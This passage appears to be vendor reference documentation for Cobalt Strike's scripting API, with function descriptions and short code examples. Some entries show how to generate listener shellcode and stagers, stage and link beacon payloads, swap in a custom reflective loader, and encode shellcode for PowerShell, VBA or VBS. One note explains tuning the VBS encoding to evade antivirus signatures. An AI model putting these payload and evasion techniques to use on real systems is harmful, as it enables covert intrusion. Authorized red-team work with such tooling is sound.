An array of dictionary objects with information about each screenshot.
Example
printAll(screenshots());
script_resource
Returns the full path to a resource that is stored relative to this script file.
Arguments
$1
- the file to get a path for
Returns
The full path to the specified file.
Example
println(script_resource("dummy.txt"));
separator
Insert a separator into the current menu tree.
Example
popup foo {
    item "Stuff" { ... }
    separator();
    item "Other Stuff" { ... }
}
services
Returns a list of services in Cobalt Strike’s data model.
Returns
An array of dictionary objects with information about each service.
Example
printAll(services());
setup_reflective_loader
Insert the reflective loader executable code into a beacon payload.
Arguments
$1
- Original beacon executable payload.
$2
- User defined Reflective Loader executable data.
Returns
The beacon executable payload updated with the user defined reflective loader. $null if there is an error.
Notes
The user defined Reflective Loader must be less than 5k.
Example
See BEACON_RDLL_GENERATE hook
# ---------------------------------------------------------------------
# Replace the beacons default loader with '$loader'.
# ---------------------------------------------------------------------
$temp_dll = setup_reflective_loader($2, $loader);
shellcode
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &stager instead.
Returns raw shellcode for a specific Cobalt Strike listener
Arguments
$1
- the listener name
$2
- true/false: is this shellcode destined for a remote target?
$3
- x86|x64 - the architecture of the stager output.
Note
Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.
Returns
A scalar containing shellcode for the specified listener.
Example
$data = shellcode("my listener", false, "x86");
$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);
showVisualization
Switch Cobalt Strike visualization to a registered visualization.
Arguments
$1
- the name of the visualization
Example
bind Ctrl+H {
    showVisualization("Hello World");
}
show_error
Shows an error message to the user in a dialog box. Use this function to relay error information.
Arguments
$1
- the message text
Example
show_error("You did something bad.");
show_message
Shows a message to the user in a dialog box. Use this function to relay information.
Arguments
$1
- the message text
Example
show_message("You've won a free ringtone");
site_host
Host content on Cobalt Strike’s web server
Arguments
$1
- the host for this site ([&localip] is a good default)
$2
- the port (e.g., 80)
$3
- the URI (e.g., /foo)
$4
- the content to host (as a string)
$5
- the mime-type (e.g., “text/plain”)
$6
- a description of the content. Shown in Attacks → Web Drive-by → Manage.
$7
- use SSL or not (true or false)
Returns
The URL to this hosted site
Example
site_host(localip(), 80, "/", "Hello World!", "text/plain", "Hello World Page", false);
site_kill
Remove a site from Cobalt Strike’s web server
Arguments
$1
- the port
$2
- the URI
Example
# removes the content bound to / on port 80
site_kill(80, "/");
sites
Returns a list of sites tied to Cobalt Strike’s web server.
Returns
An array of dictionary objects with information about each registered site.
Example
printAll(sites());
ssh_command_describe
Describe an SSH command.
Returns
A string description of the SSH command.
Arguments
$1
- the command
Example
println(ssh_command_describe("sudo"));
ssh_command_detail
Get the help information for an SSH command.
Returns
A string with helpful information about an SSH command.
Arguments
$1
- the command
Example
println(ssh_command_detail("sudo"));
ssh_command_register
Register help information for an SSH console command.
Arguments
$1
- the command
$2
- the short description of the command
$3
- the long-form help for the command.
Example
ssh_alias echo {
blog($1, "You typed: " . substr($1, 5));
}
ssh_command_register(
"echo",
"echo posts to the current session's log",
"Synopsis: echo [arguments]\n\nLog arguments to the SSH console");
ssh_commands
Get a list of SSH commands.
Returns
An array of SSH commands.
Example
printAll(ssh_commands());
stager
Returns the stager for a specific Cobalt Strike listener
Arguments
$1
- the listener name
$2
- x86|x64 - the architecture of the stager output.
Note
Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.
Returns
A scalar containing shellcode for the specified listener.
Example
$data = stager("my listener", "x86");
$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);
stager_bind_pipe
Arguments
$1
- the listener name
Returns
A scalar containing x86 bind_pipe shellcode.
Example
# step 1. generate our stager
$stager = stager_bind_pipe("my listener");
# step 2. do something to run our stager
# step 3. stage a payload via this stager
beacon_stage_pipe($bid, $target, "my listener", "x86");
# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");
stager_bind_tcp
Arguments
$1
- the listener name
$2
- x86|x64 - the architecture of the stager output.
$3
- the port to bind to
Returns
A scalar containing bind_tcp shellcode
Example
# step 1. generate our stager
$stager = stager_bind_tcp("my listener", "x86", 1234);
# step 2. do something to run our stager
# step 3. stage a payload via this stager
beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");
# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");
See also
&artifact_general
str_chunk
Chunk a string into multiple parts
Arguments
$1
- the string to chunk
$2
- the maximum size of each chunk
Returns
The original string split into multiple chunks
Example
# hint... :)
else if ($1 eq "template.x86.ps1") {
local('$enc');
$enc = str_chunk(base64_encode($2), 61);
return strrep($data, '%%DATA%%', join("' + '", $enc));
}
str_decode
Convert a string of bytes to text with the specified encoding.
Arguments
$1
- the string to decode
$2
- the encoding to use.
Returns
The decoded text.
Example
# convert back to a string we can use (from UTF16-LE)
$text = str_decode($string, "UTF16-LE");
str_encode
Convert text to byte string with the specified character encoding.
Arguments
$1
- the string to encode
$2
- the encoding to use
Returns
The resulting string.
Example
# convert to UTF16-LE
$encoded = str_encode("this is some text", "UTF16-LE");
str_xor
Walk a string and XOR it with the provided key.
Arguments
$1
- the string to mask
$2
- the key to use (string)
Returns
The original string masked with the specified key.
Example
$mask = str_xor("This is a string", "key");
$plain = str_xor($mask, "key");
sync_download
Sync a downloaded file (View → Downloads) to a local path.
Arguments
$1
- the remote path to the file to sync.
$2
- where to save the file locally
$3
- [optional] a callback function to execute when download is synced. The first argument to this function is the local path of the downloaded file.
Example
# sync all downloads
command ga {
local('$download $lpath $name $count');
foreach $count => $download (downloads()) {
($lpath, $name) = values($download, @("lpath", "name"));
sync_download($lpath, script_resource("file $+ .$count"), lambda({
println("Downloaded $1 [ $+ $name $+ ]");
}, \$name));
}
}
targets
Returns a list of host information in Cobalt Strike’s data model.
Returns
An array of dictionary objects with information about each host.
Example
printAll(targets());
tbrowser
Generate the target browser GUI component.
Returns
The target browser GUI object (a javax.swing.JComponent)
Example
addVisualization("Target Browser", tbrowser());
See also
&showVisualization
tokenToEmail
Convert a phishing token to an email address.
Arguments
$1
- the phishing token
Returns
The email address or “unknown” if the token is not associated with an email.
Example
set PROFILER_HIT {
local('$out $app $ver $email');
$email = tokenToEmail($5);
$out = "\c9[+]\o $1 $+ / $+ $2 [ $+ $email $+ ] Applications";
foreach $app => $ver ($4) {
$out .= "\n\t $+ $[25]app $ver";
}
return "$out $+ \n\n";
}
transform
Transform shellcode into another format.
Arguments
$1
- the shellcode to transform
$2
- the transform to apply
| Type | Description |
|---|---|
| array | comma separated byte values |
| hex | Hex-encode the value |
| powershell-base64 | PowerShell.exe-friendly base64 encoder |
| vba | a VBA array() with newlines added in |
| vbs | a VBS expression that results in a string |
| veil | Veil-ready string (\x##\x##) |
Returns
The shellcode after the specified transform is applied
Example
println(transform("This is a test!", "veil"));
transform_vbs
Transform shellcode into a VBS expression that results in a string
Arguments
$1
- the shellcode to transform
$2
- the maximum length of a plaintext run
Notes
- Previously, Cobalt Strike would embed its stagers into VBS files as several Chr() calls concatenated into a string.
- Cobalt Strike 3.9 introduced features that required larger stagers. These larger stagers were too big to embed into a VBS file with the above method.
- To get past this VBS limitation, Cobalt Strike opted to use Chr() calls for non-ASCII data and runs of double-quoted strings for printable characters.
- This change, an engineering necessity, unintentionally defeated static anti-virus signatures for Cobalt Strike's default VBS artifacts at that time.
- If you're looking for an easy evasion benefit with VBS artifacts, consider adjusting the plaintext run length in your Resource Kit.
Returns
The shellcode after this transform is applied
Example
println(transform_vbs("This is a test!", "3"));
tstamp
Format a time into a date/time value. This value does not include seconds.
Arguments
$1
- the time [milliseconds since the UNIX epoch]
Example
println("The time is now: " . tstamp(ticks()));
unbind
Remove a keyboard shortcut binding.
Arguments
$1
- the keyboard shortcut
Example
# restore default behavior of Ctrl+Left and Ctrl+Right
unbind("Ctrl+Left");
unbind("Ctrl+Right");
See also
&bind
url_open
Open a URL in the default browser.
Arguments
$1
- the URL to open
Example
command go {
url_open("http://forum.cobaltstrike.net/");
}
users
Returns a list of users connected to this team server.
Returns
An array of users.
Example
foreach $user (users()) {
println($user);
}
vpn_interface_info
Get information about a VPN interface.
Arguments
$1
- the interface name
$2
- [Optional] the key to extract a value for
Returns
%info = vpn_interface_info("interface");
Returns a dictionary with the metadata for this interface.
$value = vpn_interface_info("interface", "key");
Returns the value for the specified key from this interface’s metadata
Example
# create a script console alias to interface info
command interface {
println("Interface $1");
foreach $key => $value (vpn_interface_info($1)) {
println("$[15]key $value");
}
}
vpn_interfaces
Return a list of VPN interface names
Returns
An array of interface names.
Example
printAll(vpn_interfaces());
vpn_tap_create
Create a Covert VPN interface on the team server system.
Arguments
$1
- the interface name (e.g., phear0)
$2
- the MAC address ($null will make a random MAC address)
$3
- reserved; use $null for now.
$4
- the port to bind the VPN’s channel to
$5
- the type of channel [bind, http, icmp, reverse, udp]
Example
vpn_tap_create("phear0", $null, $null, 7324, "udp");
vpn_tap_delete
Destroy a Covert VPN interface
Arguments
$1
- the interface name (e.g., phear0)
Example
vpn_tap_delete("phear0");